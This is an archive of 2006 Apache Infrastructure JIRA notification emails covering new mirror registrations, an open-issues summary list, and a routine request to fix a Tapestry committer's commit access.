(localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 93C2F410005 for <[email protected]>; Tue, 20 Jun 2006 16:01:30 +0000 (GMT) Message-ID: <14848606.1150819290587.JavaMail.jira@brutus> Date: Tue, 20 Jun 2006 16:01:30 +0000 (GMT+00:00) From: "Jaroslaw Walasztyn (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-854) New PL Mirror In-Reply-To: <8774574.1150819170613.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-854?page=all ] Jaroslaw Walasztyn updated INFRA-854: ------------------------------------- Description: * URL: http://ftp.agh.nzs.pl * Country: Poland * Contact: [email protected] * Update frequency: 6h * Rsync repository: rsync.apache.org * Approximate bandwidth: 10/100Mbit * I have configured my HTTP server as requested: yes * I have subscribed to the mirror maintainers mailing list: no was: * URL: http://ftp.agh.nzs.pl * Country: Poland * Contact: [email protected] * Update frequency: 6h * Rsync repository: rsync.apache.org * Approximate bandwidth: 10mbit but soon(2 weeks) gona be 100GB * I have configured my HTTP server as requested: yes * I have subscribed to the mirror maintainers mailing list: no > New PL Mirror > ------------- > > Key: INFRA-854 > URL: http://issues.apache.org/jira/browse/INFRA-854 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Environment: Apache/1.3.33 , Debian 3.1, 40 GB > Reporter: Jaroslaw Walasztyn > > * URL: http://ftp.agh.nzs.pl > * Country: Poland > * Contact: [email protected] > * Update frequency: 6h > * Rsync repository: rsync.apache.org > * Approximate bandwidth: 10/100Mbit > * I have configured my HTTP server as requested: yes > * I have subscribed to the mirror maintainers mailing list: no -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 01:33:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75985 invoked from network); 21 Jun 2006 01:33:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 01:33:03 -0000 Received: (qmail 9224 invoked by uid 500); 21 Jun 2006 01:32:56 -0000 Delivered-To: [email protected] Received: (qmail 8905 invoked by uid 500); 21 Jun 2006 01:32:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8853 invoked by uid 99); 21 Jun 2006 01:32:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 18:32:54 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 18:32:53 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5A895410005 for <[email protected]>; Wed, 21 Jun 2006 01:31:30 +0000 (GMT) Message-ID: <19179185.1150853490352.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 01:31:30 +0000 (GMT+00:00) From: [email protected] To: [email protected] Subject: [jira] Subscription: Open INFRA issues MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Issue Subscription Filter: Open INFRA issues (76 issues) Subscriber: [email protected] Key Summary INFRA-854 New PL Mirror http://issues.apache.org/jira/browse/INFRA-854 INFRA-853 Setup ADF Faces in continuum http://issues.apache.org/jira/browse/INFRA-853 INFRA-851 Struts project - Create Confluence Instance http://issues.apache.org/jira/browse/INFRA-851 INFRA-850 Update moderators for JMeter mailing lists http://issues.apache.org/jira/browse/INFRA-850 INFRA-849 New Armenian mirror http://issues.apache.org/jira/browse/INFRA-849 INFRA-848 Create new Jira Project for Incubator Preoject Abdera http://issues.apache.org/jira/browse/INFRA-848 INFRA-847 Fan failure in helios http://issues.apache.org/jira/browse/INFRA-847 INFRA-846 http mirror fixed http://issues.apache.org/jira/browse/INFRA-846 INFRA-841 Maven repositories not being synchronized? http://issues.apache.org/jira/browse/INFRA-841 INFRA-839 Private list for Tuscany project http://issues.apache.org/jira/browse/INFRA-839 INFRA-838 Restore Apache mirror http://issues.apache.org/jira/browse/INFRA-838 INFRA-836 new wiki request: lucy http://issues.apache.org/jira/browse/INFRA-836 INFRA-834 Please add new mirror in Germany, Hannover http://issues.apache.org/jira/browse/INFRA-834 INFRA-831 New NL mirror http://issues.apache.org/jira/browse/INFRA-831 INFRA-828 New / Renewed Mirror in USA http://issues.apache.org/jira/browse/INFRA-828 INFRA-827 New mirror - please add http://issues.apache.org/jira/browse/INFRA-827 INFRA-826 Mail archives out of sync http://issues.apache.org/jira/browse/INFRA-826 INFRA-825 Issue visibility not enabled in the form associated to the issue creation. http://issues.apache.org/jira/browse/INFRA-825 INFRA-824 Internal error when creating Tomcat 6 issue. http://issues.apache.org/jira/browse/INFRA-824 INFRA-823 Create HiveMind TLP http://issues.apache.org/jira/browse/INFRA-823 INFRA-821 Disable weekly Bugzilla reports for Jakarta Commons http://issues.apache.org/jira/browse/INFRA-821 INFRA-820 new http mirror for apache.org with german location http://issues.apache.org/jira/browse/INFRA-820 INFRA-819 New Mirror http://issues.apache.org/jira/browse/INFRA-819 INFRA-815 SPF Records for incubator.apache.org are wrong. http://issues.apache.org/jira/browse/INFRA-815 INFRA-813 Import Jira projects into the main Jira http://issues.apache.org/jira/browse/INFRA-813 INFRA-808 Install request: apr v1.2.7 Solaris PKG within the zones http://issues.apache.org/jira/browse/INFRA-808 INFRA-797 Create new mailing lists for HiveMind http://issues.apache.org/jira/browse/INFRA-797 INFRA-796 Move HiveMind wiki from Jakarta to top-level http://issues.apache.org/jira/browse/INFRA-796 INFRA-793 Add reply-to header to Tomcat digest lists http://issues.apache.org/jira/browse/INFRA-793 INFRA-782 Need to switch nameservers for apachecon.com urgently http://issues.apache.org/jira/browse/INFRA-782 INFRA-777 Use wrapper to automatically restart Java services http://issues.apache.org/jira/browse/INFRA-777 INFRA-768 Missing HTML escaping in ViewCVS' svn diffs http://issues.apache.org/jira/browse/INFRA-768 INFRA-761 Import Torque issues into JIRA http://issues.apache.org/jira/browse/INFRA-761 INFRA-738 Create initial subscriber list for OFBiz lists, using input from OFBiz project http://issues.apache.org/jira/browse/INFRA-738 INFRA-734 Alias for commits to /xmlgraphics/commons http://issues.apache.org/jira/browse/INFRA-734 INFRA-726 Remove old Lucene @jakarta.apache.org lists http://issues.apache.org/jira/browse/INFRA-726 INFRA-710 Nameserver entries for myfaces.org http://issues.apache.org/jira/browse/INFRA-710 INFRA-708 Rename/move of mailing list breaks archive URIs http://issues.apache.org/jira/browse/INFRA-708 INFRA-705 create [email protected] to supercede [email protected] http://issues.apache.org/jira/browse/INFRA-705 INFRA-698 Monitoring lenya.zones server http://issues.apache.org/jira/browse/INFRA-698 INFRA-690 Please create new Wiki for the Public Relations Committee (PRC) at wiki.apache.org/Talks http://issues.apache.org/jira/browse/INFRA-690 INFRA-624 svn --revprop svn:log changes not reflected in Jira issues http://issues.apache.org/jira/browse/INFRA-624 INFRA-608 Document Xserve installations http://issues.apache.org/jira/browse/INFRA-608 INFRA-607 Harden Xserve installations http://issues.apache.org/jira/browse/INFRA-607 INFRA-602 Configure Xserves as mail spool servers http://issues.apache.org/jira/browse/INFRA-602 INFRA-589 Replicate SpamAssassin Bugzilla e-mail comment setup on Ajax http://issues.apache.org/jira/browse/INFRA-589 INFRA-568 Account creation process should take care of apcvs ownership http://issues.apache.org/jira/browse/INFRA-568 INFRA-559 JIRA (and Bugzilla?) can't handle non-latin characters http://issues.apache.org/jira/browse/INFRA-559 INFRA-558 please close the scarab tracker for Turbine 2 http://issues.apache.org/jira/browse/INFRA-558 INFRA-537 A few updates for the XML Graphics project http://issues.apache.org/jira/browse/INFRA-537 INFRA-443 setup xmlbeans-cxx subversion for incubator http://issues.apache.org/jira/browse/INFRA-443 INFRA-424 Install OpenSSL into /opt on the zones http://issues.apache.org/jira/browse/INFRA-424 INFRA-412 Implement proper mail-to-jira bridge http://issues.apache.org/jira/browse/INFRA-412 INFRA-407 Links on Saved searches Preferences tab are missing http://issues.apache.org/jira/browse/INFRA-407 INFRA-398 Turn off eyebrowse? http://issues.apache.org/jira/browse/INFRA-398 INFRA-397 Create a simple commandline tool for searching private e-mail archives http://issues.apache.org/jira/browse/INFRA-397 INFRA-391 Create a web application for creating and editing ~/.forward files http://issues.apache.org/jira/browse/INFRA-391 INFRA-371 point myfaces.org to myfaces.apache.org http://issues.apache.org/jira/browse/INFRA-371 INFRA-352 Tweak the message body for jira notifications http://issues.apache.org/jira/browse/INFRA-352 INFRA-348 Make account-mailer provide host information http://issues.apache.org/jira/browse/INFRA-348 INFRA-347 Install svn:infrastructure/trunk/tools on all our machines http://issues.apache.org/jira/browse/INFRA-347 INFRA-346 Seriously clean up the infrastructure website documentation http://issues.apache.org/jira/browse/INFRA-346 INFRA-345 Write a script to detect unused accounts http://issues.apache.org/jira/browse/INFRA-345 INFRA-343 Write a script to remove svn auth credentials from the user accounts on our servers http://issues.apache.org/jira/browse/INFRA-343 INFRA-342 Develop a CLA processing tool http://issues.apache.org/jira/browse/INFRA-342 INFRA-341 Standardised form for requesting standard resources http://issues.apache.org/jira/browse/INFRA-341 INFRA-338 Create an automated way to keep crontabs synced with SVN http://issues.apache.org/jira/browse/INFRA-338 INFRA-334 Document service checklist as part of www.apache.org/dev/ http://issues.apache.org/jira/browse/INFRA-334 INFRA-330 Jira periodic issue summaries should include assignees http://issues.apache.org/jira/browse/INFRA-330 INFRA-315 SRS patch should be applied when available (SPF fail with mailinglists broken) http://issues.apache.org/jira/browse/INFRA-315 INFRA-261 Wiki change notifications need to look like they did before http://issues.apache.org/jira/browse/INFRA-261 INFRA-250 Enable e-mail comments for Bugzilla http://issues.apache.org/jira/browse/INFRA-250 INFRA-235 RFE: magic "revision" keyword in bugzilla comments http://issues.apache.org/jira/browse/INFRA-235 INFRA-227 Enable email tracking for Bugzilla http://issues.apache.org/jira/browse/INFRA-227 INFRA-222 anti-virus filtering overzealous for one specific list http://issues.apache.org/jira/browse/INFRA-222 INFRA-210 svnmailer breaks utility of diffs contained in SVN patches http://issues.apache.org/jira/browse/INFRA-210 From [email protected] Wed Jun 21 09:02:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22140 invoked from network); 21 Jun 2006 09:01:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 09:01:59 -0000 Received: (qmail 2522 invoked by uid 500); 21 Jun 2006 09:01:57 -0000 Delivered-To: [email protected] Received: (qmail 2221 invoked by uid 500); 21 Jun 2006 09:01:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2210 invoked by uid 99); 21 Jun 2006 09:01:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 02:01:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 02:01:55 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E450B7141E6 for <[email protected]>; Wed, 21 Jun 2006 09:00:30 +0000 (GMT) Message-ID: <7806097.1150880430908.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 09:00:30 +0000 (GMT+00:00) From: "Alexander Ryumshin (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-855) mirror information change for apache.alkar.net MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N mirror information change for apache.alkar.net ---------------------------------------------- Key: INFRA-855 URL: http://issues.apache.org/jira/browse/INFRA-855 Project: Infrastructure Type: Improvement Components: Mirrors Reporter: Alexander Ryumshin Please update the information for apache.alkar.net (changed the URL and made some cosmetic updates) URL of mirror: http://apache.net.ua/ Country where the mirror is located: Ukraine Contact email address: [email protected] Update frequency: four times a day Rsync repository used: rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist Approximate bandwidth: 100 mbit I have configured my HTTP server as requested (yes/no): yes I have subscribed to the mirror maintainers mailing list (yes/no): yes, always been :) -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 12:36:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11040 invoked from network); 21 Jun 2006 12:32:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 12:32:58 -0000 Received: (qmail 5761 invoked by uid 500); 21 Jun 2006 12:31:56 -0000 Delivered-To: [email protected] Received: (qmail 5540 invoked by uid 500); 21 Jun 2006 12:31:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5529 invoked by uid 99); 21 Jun 2006 12:31:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 05:31:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 05:31:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 536D5410005 for <[email protected]>; Wed, 21 Jun 2006 12:30:30 +0000 (GMT) Message-ID: <14807295.1150893030300.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 12:30:30 +0000 (GMT+00:00) From: "Shane S Brath (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-828) New / Renewed Mirror in USA In-Reply-To: <9343860.1149463410303.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-828?page=comments#action_12417095 ] Shane S Brath commented on INFRA-828: ------------------------------------- I checked and the updating is running, and the DATE file is being updated. Can you paste in the URL you checked so I can look into why it's not updating according to youre test? Shane. > New / Renewed Mirror in USA > --------------------------- > > Key: INFRA-828 > URL: http://issues.apache.org/jira/browse/INFRA-828 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Shane S Brath > Priority: Minor > > URL of mirror : http://apache.mirrors.tds.net > Country where the mirror is located : Madison, Wisconsin, USA > Contact email address : [email protected] > Update frequency : 2 times per day ( can me more if needed ) > Rsync repository used : rsync.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist > Approximate bandwidth : 1G/s > I have configured my HTTP server as requested (yes/no) : yes > I have subscribed to the mirror maintainers mailing list (yes/no) : yes > had mirror running before, but had server problem and am now back and stable and ready to be re-added.. > Shane. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 13:30:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38516 invoked from network); 21 Jun 2006 13:30:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 13:30:04 -0000 Received: (qmail 31054 invoked by uid 500); 21 Jun 2006 13:30:02 -0000 Delivered-To: [email protected] Received: (qmail 29986 invoked by uid 500); 21 Jun 2006 13:29:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29964 invoked by uid 99); 21 Jun 2006 13:29:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:29:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:29:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2C5CF410005 for <[email protected]>; Wed, 21 Jun 2006 13:28:30 +0000 (GMT) Message-ID: <14604731.1150896510163.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 13:28:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-828) New / Renewed Mirror in USA In-Reply-To: <9343860.1149463410303.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-828?page=comments#action_12417105 ] Joshua Slive commented on INFRA-828: ------------------------------------ It looks okay at the moment. It may be a couple weeks before I get around to adding it, however. > New / Renewed Mirror in USA > --------------------------- > > Key: INFRA-828 > URL: http://issues.apache.org/jira/browse/INFRA-828 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Shane S Brath > Priority: Minor > > URL of mirror : http://apache.mirrors.tds.net > Country where the mirror is located : Madison, Wisconsin, USA > Contact email address : [email protected] > Update frequency : 2 times per day ( can me more if needed ) > Rsync repository used : rsync.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist > Approximate bandwidth : 1G/s > I have configured my HTTP server as requested (yes/no) : yes > I have subscribed to the mirror maintainers mailing list (yes/no) : yes > had mirror running before, but had server problem and am now back and stable and ready to be re-added.. > Shane. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 13:39:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41432 invoked from network); 21 Jun 2006 13:39:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 13:39:00 -0000 Received: (qmail 51938 invoked by uid 500); 21 Jun 2006 13:38:55 -0000 Delivered-To: [email protected] Received: (qmail 51656 invoked by uid 500); 21 Jun 2006 13:38:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51608 invoked by uid 99); 21 Jun 2006 13:38:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:38:54 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:38:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C020C410005 for <[email protected]>; Wed, 21 Jun 2006 13:37:29 +0000 (GMT) Message-ID: <13623744.1150897049768.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 13:37:29 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-856) karma management access for tapestry MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N karma management access for tapestry ------------------------------------ Key: INFRA-856 URL: http://issues.apache.org/jira/browse/INFRA-856 Project: Infrastructure Type: Wish Security: public (Regular issues) Components: Subversion Environment: minotaur Reporter: Jesse Kuhnert There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 13:46:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44009 invoked from network); 21 Jun 2006 13:45:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 13:45:46 -0000 Received: (qmail 62492 invoked by uid 500); 21 Jun 2006 13:44:56 -0000 Delivered-To: [email protected] Received: (qmail 62219 invoked by uid 500); 21 Jun 2006 13:44:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62208 invoked by uid 99); 21 Jun 2006 13:44:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:44:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:44:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 32CBC410005 for <[email protected]>; Wed, 21 Jun 2006 13:43:30 +0000 (GMT) Message-ID: <10613488.1150897410178.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 13:43:30 +0000 (GMT+00:00) From: "Garrett Rooney (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-856) karma management access for tapestry In-Reply-To: <13623744.1150897049768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-856?page=comments#action_12417107 ] Garrett Rooney commented on INFRA-856: -------------------------------------- Uhh, well, since you haven't revealed who the person is, I'm not entirely clear how you expect anyone to do anything about it... > karma management access for tapestry > ------------------------------------ > > Key: INFRA-856 > URL: http://issues.apache.org/jira/browse/INFRA-856 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Subversion > Environment: minotaur > Reporter: Jesse Kuhnert > > There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. > I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 13:53:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48479 invoked from network); 21 Jun 2006 13:53:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 13:53:03 -0000 Received: (qmail 79112 invoked by uid 500); 21 Jun 2006 13:52:57 -0000 Delivered-To: [email protected] Received: (qmail 78872 invoked by uid 500); 21 Jun 2006 13:52:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78625 invoked by uid 99); 21 Jun 2006 13:52:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:52:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 06:52:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5565D410005 for <[email protected]>; Wed, 21 Jun 2006 13:51:30 +0000 (GMT) Message-ID: <7522198.1150897890346.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 13:51:30 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-856) karma management access for tapestry In-Reply-To: <13623744.1150897049768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-856?page=comments#action_12417109 ] Jesse Kuhnert commented on INFRA-856: ------------------------------------- freemant > karma management access for tapestry > ------------------------------------ > > Key: INFRA-856 > URL: http://issues.apache.org/jira/browse/INFRA-856 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Subversion > Environment: minotaur > Reporter: Jesse Kuhnert > > There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. > I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 14:01:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51677 invoked from network); 21 Jun 2006 14:01:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 14:01:01 -0000 Received: (qmail 98278 invoked by uid 500); 21 Jun 2006 14:00:57 -0000 Delivered-To: [email protected] Received: (qmail 98033 invoked by uid 500); 21 Jun 2006 14:00:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98017 invoked by uid 99); 21 Jun 2006 14:00:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 07:00:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 07:00:55 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8F327410008 for <[email protected]>; Wed, 21 Jun 2006 13:59:31 +0000 (GMT) Message-ID: <14322995.1150898371583.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 13:59:31 +0000 (GMT+00:00) From: "Garrett Rooney (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-856) karma management access for tapestry In-Reply-To: <13623744.1150897049768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 